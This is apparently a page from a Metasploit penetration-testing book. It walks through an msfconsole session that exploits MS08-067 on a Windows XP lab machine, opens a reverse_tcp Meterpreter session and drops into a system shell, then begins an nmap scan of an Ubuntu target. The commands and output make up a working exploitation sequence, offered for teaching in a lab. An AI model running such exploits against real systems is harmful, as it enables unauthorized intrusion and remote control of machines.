background image

68

Chapter 5

Having set the stage, we’re ready to conduct the actual exploitation:

msf exploit(ms08_067_netapi) > 

exploit 

[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487) 
msf exploit(ms08_067_netapi) > 

sessions -l 

Active sessions
===============

  Id  Type         Information  Connection
  --  ----         -----------  ----------
  1   meterpreter               192.168.33.129:8080 -> 192.168.33.130:1036 

msf exploit(ms08_067_netapi) > 

sessions -i 1 

[*] Starting interaction with 1...

meterpreter > 

shell 

Process 4060 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

The 

exploit

 command at   initiates our exploit and attempts to attack 

the target. The attack succeeds and gives us a 

reverse_tcp

 Meterpreter pay-

load at  , which we can view with 

sessions -l

 at  . Only one session is active, 

as shown at  , but if we targeted multiple systems, several sessions could be 
open simultaneously. (To view a list of the exploits that created each session, 
you would enter 

sessions -l -v

.)

The 

sessions -i 1

 command is issued at   to “interact” with an individual 

session. Notice that this drops us into a Meterpreter shell. If, for example, a 
reverse command shell existed, this command would drop us straight to a 
command prompt. And, finally, at   we enter 

shell

 to jump into an interac-

tive command shell on the target. 

Congratulations! You’ve just compromised your first machine! To list the 

available commands for a particular exploit, you can enter 

show options

.

Exploiting an Ubuntu Machine

Let’s try a different exploit on an Ubuntu 9.04 virtual machine. The steps are 
pretty much the same as for the preceding exploit except that we will select a 
different payload.

msf > 

nmap -sT -A -P0 192.168.33.132

[*] exec: nmap -sT -A -P0 192.168.33.132